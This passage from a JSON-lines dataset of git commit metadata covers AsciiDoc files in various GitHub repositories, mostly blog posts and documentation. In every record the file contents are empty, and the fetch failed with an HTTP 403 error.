<4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a1fe4fe03c8e34b1580cdc2cf31259989712df","subject":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","message":"Update 2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_file":"_posts\/2016-04-21-Story-became-engineers-become-a-member-of-society-I-was-inexperienced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a9d49d4c2fabc9f4a35e0f42666049d4c574f0","subject":"Note on history topic configuration issue","message":"Note on history topic configuration issue\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"2018-03-16-note-on-database-history-topic-configuration.adoc","new_file":"2018-03-16-note-on-database-history-topic-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10e86264c5517f4254a35c0d1828d3a2d41e781a","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d578c2eeb235bedaeeb110ac3413be5aecb4f1","subject":"usage example for apoc.cypher.runTimeboxed","message":"usage example for apoc.cypher.runTimeboxed\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runTimeboxed.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runTimeboxed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"944ecc9343505d9e77d03bd54db2c0b2c15f5e02","subject":"Update 2015-02-13-Hi-Instagram.adoc","message":"Update 2015-02-13-Hi-Instagram.adoc","repos":"HubPress\/demo.hubpress.io,HubPress\/demo.hubpress.io","old_file":"_posts\/2015-02-13-Hi-Instagram.adoc","new_file":"_posts\/2015-02-13-Hi-Instagram.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/demo.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ffdbc07c33823697833de754e9e2c476ec5396e","subject":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","message":"Publish 2094-1-1-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_file":"2094-1-1-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34234a7b8ee63033d4872cbd453673dbb84a56ff","subject":"add manually post","message":"add manually post\n","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2011-10-04-Day-One---Arquillian--the-Extendable-Enterprise-Application-Test-Platform.adoc","new_file":"_posts\/2011-10-04-Day-One---Arquillian--the-Extendable-Enterprise-Application-Test-Platform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b033d2dec7c8cbdb510dc5b4c769b8af7eda80c8","subject":"Clean step 2","message":"Clean step 2\n","repos":"Ovea\/bdd-todolist,Ovea\/bdd-todolist","old_file":"step-2\/src\/main\/asciidoc\/index.adoc","new_file":"step-2\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ovea\/bdd-todolist.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4141bcf0b328f7aba606ed46830dd4890afe1581","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594f59453fb6000bd9d77892fdec49def725fa97","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8f8967332c6a0c170185097db0cbeaa015dd1a3","subject":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","message":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","new_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-using-AngularJS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82451e14bf3776176588e13ebba0179ac0d57ae7","subject":"Update 2016-02-10-Gradle-and-C-C.adoc","message":"Update 2016-02-10-Gradle-and-C-C.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io","old_file":"_posts\/2016-02-10-Gradle-and-C-C.adoc","new_file":"_posts\/2016-02-10-Gradle-and-C-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"198b993e3da698ecd63439498a4ce87798a9e5f2","subject":"Update 2017-04-30-Verbrecherisch.adoc","message":"Update 2017-04-30-Verbrecherisch.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-30-Verbrecherisch.adoc","new_file":"_posts\/2017-04-30-Verbrecherisch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9002e73b8826a4526088038aa23038d9fe8dc9c","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"968a109471325b9cbd86f0b63b3e742a6e8c86c7","subject":"Introduce implemetation note for 12403\/12404.","message":"Introduce implemetation note for 12403\/12404.\n","repos":"leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12403_12404_project_marking_issues\/12403_12404_project_marking_issues.int.adoc","new_file":"doc-bridgepoint\/notes\/12403_12404_project_marking_issues\/12403_12404_project_marking_issues.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f36247a2502940d5e1b10298fe569c4e2a7675ec","subject":"Update 2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","message":"Update 2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","repos":"quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io,quentindemolliens\/quentindemolliens.github.io","old_file":"_posts\/2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","new_file":"_posts\/2015-05-28-A-la-rencontre-de-Francois-Taillez-Cotes-de-Bourg-Chateau-Grand-Maison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quentindemolliens\/quentindemolliens.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adb5c1860aa5fde5565f4c8cab7753613503ee06","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e97a04e05a5eae2306f1752fac5512c4371afd05","subject":"Update 2016-02-10-Hello-World.adoc","message":"Update 2016-02-10-Hello-World.adoc","repos":"al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io,al1enSuu\/al1enSuu.github.io","old_file":"_posts\/2016-02-10-Hello-World.adoc","new_file":"_posts\/2016-02-10-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/al1enSuu\/al1enSuu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1adb05428256b6af9c29bf60ab5ef44dd6b4eb","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c33d8063bb09868307ac744e273a3f998301133e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/12\/02\/deref.adoc","new_file":"content\/news\/2021\/12\/02\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e1881e6aea7750cba5663d14a19f860823c746fd","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/27\/deref.adoc","new_file":"content\/news\/2022\/05\/27\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2b37fe627e46a3fa9426b47462784407bd8dc62e","subject":"Update 2017-02-01-A-Anatomia-de-um-Game.adoc","message":"Update 2017-02-01-A-Anatomia-de-um-Game.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-02-01-A-Anatomia-de-um-Game.adoc","new_file":"_posts\/2017-02-01-A-Anatomia-de-um-Game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53eef5bec3a1a7eb813689c5dd3c2098b9964d8d","subject":"Update 2015-06-10-First-Try.adoc","message":"Update 2015-06-10-First-Try.adoc","repos":"leomedia\/blog,leomedia\/blog,leomedia\/blog","old_file":"_posts\/2015-06-10-First-Try.adoc","new_file":"_posts\/2015-06-10-First-Try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leomedia\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"196c0638cde9c989d89dde46494e8627eae26ce7","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b496e71adb2ae3c7b106e23354c369a1486326ed","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a80a5d162e95ade946c36b49cee32063e866c948","subject":"y2b create post Phone with 15 Year Battery Life?! Spare One Emergency Cell Phone - CES 2013","message":"y2b create post Phone with 15 Year Battery Life?! Spare One Emergency Cell Phone - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-07-Phone-with-15-Year-Battery-Life-Spare-One-Emergency-Cell-Phone--CES-2013.adoc","new_file":"_posts\/2013-01-07-Phone-with-15-Year-Battery-Life-Spare-One-Emergency-Cell-Phone--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12e61bfdeae7c9388cb229db9421ec67e99e749a","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus%205T%20Lava%20Red%20Unboxing%20-%20%24500%20Can't%20Go%20Further.adoc","new_file":"_posts\/2018-01-19-OnePlus%205T%20Lava%20Red%20Unboxing%20-%20%24500%20Can't%20Go%20Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e823526a856dd7326a37ecef59405aa3283857ec","subject":"Update 2016-11-11-232000-Friday.adoc","message":"Update 2016-11-11-232000-Friday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-11-232000-Friday.adoc","new_file":"_posts\/2016-11-11-232000-Friday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e01cc5a162803b584530d9676e3c16bc44365d7","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"631888b99301714a44f3b7b99a836ec5a0f9dcdb","subject":"Update 2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","message":"Update 2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_file":"_posts\/2013-11-11-Java-EE-7-and-WebSocket-API-for-Java-JSR-356-with-AngularJS-on-WildFly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"843866c654af4dcc405b7ab9d8b30ae0a7fc1144","subject":"Add placeholder flow diagram chapter","message":"Add placeholder flow diagram chapter\n","repos":"bsmr-erlang\/cowboy,CrankWheel\/cowboy,ninenines\/cowboy,turtleDeng\/cowboy,hairyhum\/cowboy,kivra\/cowboy,rabbitmq\/cowboy,K2InformaticsGmbH\/cowboy","old_file":"doc\/src\/guide\/flow_diagram.asciidoc","new_file":"doc\/src\/guide\/flow_diagram.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rabbitmq\/cowboy.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"dce74827394e3cf0a195480fc875aac1f3ab2cd7","subject":"Create readme.adoc","message":"Create readme.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"kafka\/kafka-wildfly\/readme.adoc","new_file":"kafka\/kafka-wildfly\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cafb23d2832a2ac2872d8de604981a386ffdf1e3","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e4c4c3983efe84991ad5140b8e1907b9ee02056","subject":"Update 2015-10-23-HSBC-Premier.adoc","message":"Update 2015-10-23-HSBC-Premier.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-10-23-HSBC-Premier.adoc","new_file":"_posts\/2015-10-23-HSBC-Premier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edf9bb430ae7215c71a5844ec846e1128841536","subject":"Add info how to remove a node","message":"Add info how to remove a node\n","repos":"BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85a447b874bd4feebc0c14701a9ce39fc35bee41","subject":"Switch back to codecov.io in README.adoc","message":"Switch back to codecov.io in README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80d159b2ccd0d5177d14905f72de2b5fe60612ba","subject":"Add missing resource_registry section into sample env file","message":"Add missing resource_registry section into sample env file\n\nThe sample file in README didn't contain required resource_registry\nsection which caused that some router types were undefined.\n\nFixes: #172\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cf6af0ac4e5f3caca24f82119fb6f1f6fe0178c","subject":"added README for saslauthd-port","message":"added README for saslauthd-port\n\nChange-Id: Ibaf073149ec3d78f3265b4e23c236b420942c14a\nReviewed-on: http:\/\/review.couchbase.org\/44116\nReviewed-by: Artem Stemkovski <15a0730a27c69f62ab86f2b6c639fca202166c02@couchbase.com>\nTested-by: Aliaksey Kandratsenka <340b8e09ca65cd3fc686427fcfed17e87eaf61e2@gmail.com>\nReviewed-by: Aliaksey Artamonau <3c875bcfb3adf2a65b2ae7686ca921e6c9433147@gmail.com>\n","repos":"couchbase\/cbauth,couchbase\/cbauth","old_file":"cmd\/saslauthd-port\/README.asciidoc","new_file":"cmd\/saslauthd-port\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbase\/cbauth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1f1a3aac2cbd0b2ed5858a03ecfa5837fdaa67d","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a917288be95290189b41ff6aedbc4651840a47","subject":"docs: add missing `build` module","message":"docs: add missing `build` module\n\nThis was not added because the root `.gitignore` file contained `build\/`\n(fixed by 4dd70d0 (\".gitignore: simplify\")).\n\nSigned-off-by: Philippe Proulx <2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"efficios\/barectf,efficios\/barectf","old_file":"docs\/modules\/build\/pages\/index.adoc","new_file":"docs\/modules\/build\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/efficios\/barectf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c399612d0d186269426f52fc2951448c254194d1","subject":"Update 2015-07-24-Very-basic-music-visualization-template.adoc","message":"Update 